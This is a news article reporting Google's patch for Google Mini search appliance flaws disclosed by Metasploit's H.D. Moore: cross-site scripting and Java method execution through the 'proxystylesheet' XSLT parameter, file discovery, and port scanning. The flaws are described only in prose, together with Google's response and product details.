Search engine darling Google Inc. has issued a patch to cover a range of potentially dangerous security flaws in the enterprise-facing Google Mini search appliance.
The companys patch was issued after researchers at the Metasploit Project pinpointed several bugs that can be exploited by malicious hackers to conduct cross-site scripting, file discovery and service enumeration attackers.
Metasploit creator H.D. Moore warned in an advisory that the most serious bug can lead to arbitrary command execution.
Security alerts aggregator Secunia Inc. rates the flaws as “highly critical.”
According to Moore, Googles patch and advisory were only released to businesses that pay about $3,000 for the pizza box-sized appliance.
A spokesperson for Google said the company learned of the issue several months ago and quickly made a patch available to all enterprise customers. “No customers have reported any effect related to this issue,” he added.
Metasploits Moore said the flaw was discovered in a feature that allows customization of the Google Minis search interface through XSLT (Extensible Stylesheet Language Transformations) style sheets. He explained that certain versions of the appliance allow a remote URL to be supplied as the path to the XSLT style sheet, and warned that the feature can be abused to perform malicious hacking attacks.
Moore said that input passed to the “proxystylesheet” parameter isnt properly sanitized before being returned to the user in an error message. This can be exploited to execute arbitrary HTML and script code in a users browser session in context of an affected site.
In addition, XSLT style sheets provided by a user using a URL in the “proxystylesheet” parameter also arent properly sanitized before being used. A malicious attacker can exploit this bug to execute arbitrary Java class methods on a vulnerable appliance via a malicious XSLT style sheet, Moore added.
It is also possible to conduct cross-site scripting attacks by including malicious JavaScript in the style sheet.
A third attack vector could allow an attack to determine the existence of any file on the system by using a relative path from the style sheet directory, Moore added. “The error message returned from the server will disclose whether or not a valid path was provided. This can be used to fingerprint the base operating system and kernel version.”
Metasploit also discovered that a rudimentary port scan can be performed by requesting HTTP URLs that point to a target system and individual ports on that system. The error message returned from the server will differ between open and closed ports. The appliance will ignore requests to connect back to itself, but no other restrictions apply, he added.
Google Mini, a pared-down version of the high-end Google Search Appliance, is marketed to organizations with up to about 1,000 employees or in departments of larger companies.
The Mini can index as many as 100,000 documents and works with more than 220 different file formats, including HTML, PDF and Microsoft Office.
Editors Note: This story was updated to include comments from Google.